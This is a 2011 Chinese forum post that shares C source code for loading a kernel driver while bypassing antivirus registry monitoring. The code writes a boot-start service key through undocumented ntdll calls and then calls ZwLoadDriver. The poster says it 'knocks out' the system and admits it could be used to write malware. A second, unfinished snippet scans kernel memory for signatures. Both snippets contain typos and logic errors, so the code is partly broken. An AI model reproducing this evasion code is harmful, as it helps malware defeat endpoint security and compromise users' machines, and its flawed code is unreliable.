-
-
[分享]过掉大部分、杀软注册表监控[鄙视之]
-
发表于: 2011-3-27 14:31
-
鄙视某些**哥,自以为自己一副很了不起的样子,谁都不放在眼里,装载驱动部分未放出,因为代码一放出,就可以根据此思路写许多的恶意软件,编译器:VC6。附件:2楼
注册表自动装载驱动,直接KO你系统,本机上测试了一次,里面还有点代码抄袭的论坛上哪位兄弟的,忘了是谁,在此感谢!抄袭的代码未实现
#include <windows.h>
#include <stdio.h>
#pragma pack(4)
typedef struct _LSA_UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer;
}UNICODE_STRING, *PUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
WCHAR DrvName[]=L"zzz";
HANDLE DrvKeyHandle;HANDLE DrvHandle;
WCHAR DrvImagePath[]=L"ImagePath";
WCHAR ImagePath[]=L"\\??\\C:\\Windows\\System32\\2.sys";
UNICODE_STRING KeyName;
WCHAR DrvPath[]=L"\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Services\\";
WCHAR DrvKeyType[]=L"Type";
DWORD DrvKType=1;
WCHAR PreErrorControl[]=L"ErrorConteol";
DWORD ErrorControl=1;
WCHAR PreStart[]=L"Start";
DWORD Start=0;
WCHAR DisplayName[]=L"DiaplayName";
WCHAR Name[]=L"zzz";
UNICODE_STRING DrvValueName,DrvTypeVaule,ErrName,StName,DisName,DriverPath;
ULONG Disposition;OBJECT_ATTRIBUTES Obj; ULONG AA;
#define InitializeObjectAttributes( p, n, a, r, s ) { \
(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
(p)->RootDirectory = r; \
(p)->Attributes = a; \
(p)->ObjectName = n; \
(p)->SecurityDescriptor = s; \
(p)->SecurityQualityOfService = NULL; \
}
#define OBJ_CASE_INSENSITIVE 0x00000040L
typedef ULONG (NTAPI *ZW_CREATE_KEY)(PHANDLE KeyHandle,ACCESS_MASK DesiredAccess,POBJECT_ATTRIBUTES ObjectAttributes,ULONG TitleIndex,PUNICODE_STRING Class,ULONG CreateOptions,PULONG Disposition );
typedef ULONG (NTAPI *ZW_SET_VALUE_KEY)(HANDLE KeyHandle,PUNICODE_STRING ValueName,ULONG TitleIndex,ULONG Type,PVOID Data,ULONG DataSize);
typedef ULONG (NTAPI *ZW_LOAD_DRIVER)(PUNICODE_STRING DriverServiceName);
VOID GetKernelModuleBase(VOID)
{
HINSTANCE hModule = GetModuleHandleA("Ntdll");
ZW_CREATE_KEY ZwCreateKey=(ZW_CREATE_KEY)GetProcAddress(hModule,"ZwCreateKey");
ZW_SET_VALUE_KEY ZwSetValueKey=(ZW_SET_VALUE_KEY)GetProcAddress(hModule,"ZwSetValueKey");
ZW_LOAD_DRIVER ZwLoadDriver=(ZW_LOAD_DRIVER)GetProcAddress(hModule,"ZwLoadDriver");
KeyName.Buffer=DrvPath;
KeyName.Length=wcslen(DrvPath)*sizeof(WCHAR);
KeyName.MaximumLength=KeyName.Length+sizeof(WCHAR);
InitializeObjectAttributes( &Obj, &KeyName, OBJ_CASE_INSENSITIVE, NULL, NULL );
ZwCreateKey(&DrvHandle,KEY_ALL_ACCESS,&Obj,0,NULL,REG_OPTION_NON_VOLATILE,&Disposition);
KeyName.Buffer=DrvName;
KeyName.Length=wcslen(DrvName)*sizeof(WCHAR);
KeyName.MaximumLength=KeyName.Length+sizeof(WCHAR);
InitializeObjectAttributes( &Obj, &KeyName,OBJ_CASE_INSENSITIVE,DrvHandle, NULL);
ZwCreateKey(&DrvKeyHandle, KEY_ALL_ACCESS, &Obj, 0, NULL, REG_OPTION_NON_VOLATILE,&Disposition );
DrvValueName.Buffer=DrvImagePath;
DrvValueName.Length=wcslen(DrvImagePath)*sizeof(WCHAR);
DrvValueName.MaximumLength=DrvValueName.Length+sizeof(WCHAR);
DrvTypeVaule.Buffer=DrvKeyType;
DrvTypeVaule.Length=wcslen(DrvKeyType)*sizeof(WCHAR);
DrvTypeVaule.MaximumLength=DrvTypeVaule.Length+sizeof(WCHAR);
ErrName.Buffer=PreErrorControl;
ErrName.Length=wcslen(PreErrorControl)*sizeof(WCHAR);
ErrName.MaximumLength=ErrName.Length+sizeof(WCHAR);
StName.Buffer=PreStart;
StName.Length=wcslen(PreStart)*sizeof(WCHAR);
StName.MaximumLength=StName.Length+sizeof(WCHAR);
DisName.Buffer=DisplayName;
DisName.Length=wcslen(DisplayName)*sizeof(WCHAR);
DisName.MaximumLength=DisName.Length+sizeof(WCHAR);
ZwSetValueKey(DrvKeyHandle, &DisName, 0, REG_SZ, DisplayName, wcslen( DisplayName ) * sizeof(WCHAR) );
ZwSetValueKey(DrvKeyHandle,&DrvValueName,0,REG_EXPAND_SZ,ImagePath,wcslen(ImagePath)*sizeof(WCHAR)+sizeof(WCHAR));
ZwSetValueKey(DrvKeyHandle,&DrvTypeVaule,0,REG_DWORD,&DrvKType,sizeof(DWORD));
ZwSetValueKey(DrvKeyHandle, &ErrName, 0, REG_DWORD, &ErrorControl, sizeof(DWORD) );
ZwSetValueKey(DrvKeyHandle, &StName, 0, REG_DWORD, &Start, sizeof(DWORD) );
DriverPath.Buffer=ImagePath;
DriverPath.Length=wcslen(ImagePath)*sizeof(WCHAR);
DriverPath.Length=DriverPath.Length+sizeof(WCHAR);
ZwLoadDriver(&DriverPath);
FreeLibrary(hModule);
}
抄袭的代码未实现,大家自己实现:
#include<windows.h>
#include<stdio.h>
#define SystemModuleInformation 11
typedef ULONG (WINAPI *ZW_QUERY_SYSTEM_INFORMATION)(DWORD, PVOID, ULONG, PULONG);
typedef ULONG (WINAPI *RTL_COMPARE_UNICODE_STRING)(PUNICODE_STRING String1,PUNICODE_STRING String2,BOOLEAN CaseInSensitive);
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
ULONG ModuleSize;
RTL_COMPARE_UNICODE_STRING RtlCompareUnicodeString;
void GetKernelBase(void)
{
ULONG code1_sp2=0x0000c468,code2_sp2=0xb4c06800,code3_sp2=0x77e8804d,code4_sp2=0x33fff707;
ULONG AZ;ULONG *Buf;ULONG as;SYSTEM_MODULE_INFORMATION *Module;
ULONG NtoskrnlBase;ULONG NtoskrnlEndBase;ULONG CurAddr;ULONG i; ULONG RetAddr;
HINSTANCE hModule = GetModuleHandleA("Ntdll");
ZW_QUERY_SYSTEM_INFORMATION ZwQuerySystemInformation = (ZW_QUERY_SYSTEM_INFORMATION)GetProcAddress(hModule, "ZwQuerySystemInformation");
AZ=ZwQuerySystemInformation(SystemModuleInformation,&ModuleSize,0,&ModuleSize);
RtlCompareUnicodeString=(RTL_COMPARE_UNICODE_STRING)GetProcAddress(hModule,"RtlCompareUnicodeString");
if(!AZ);
else
if(!(Buf=(ULONG*)VirtualAllocEx(GetCurrentProcess(),NULL,ModuleSize,MEM_COMMIT,PAGE_EXECUTE_READWRITE)))
ZwQuerySystemInformation(SystemModuleInformation,Buf, ModuleSize , 0);
Module=(SYSTEM_MODULE_INFORMATION*)((ULONG*)Buf+1);
NtoskrnlEndBase=(ULONG)Module->Base+(ULONG)Module->Size;//问题
NtoskrnlBase=(ULONG)Module->Base;//问题
CurAddr=NtoskrnlBase;
free(Buf);
for(i=0x80000000;i<=0xa0000000;i++)
{
printf("开始搜索\n");
if((*((ULONG *)i)==code1_sp2)&&(*((ULONG *)(i+4))==code2_sp2)&&(*((ULONG *)(i+8))==code3_sp2)&&(((ULONG*)(i+12))==code4_sp2))
{
RetAddr=i;
printf("%x",RetAddr);
}
}
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
 鄙视某些人
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
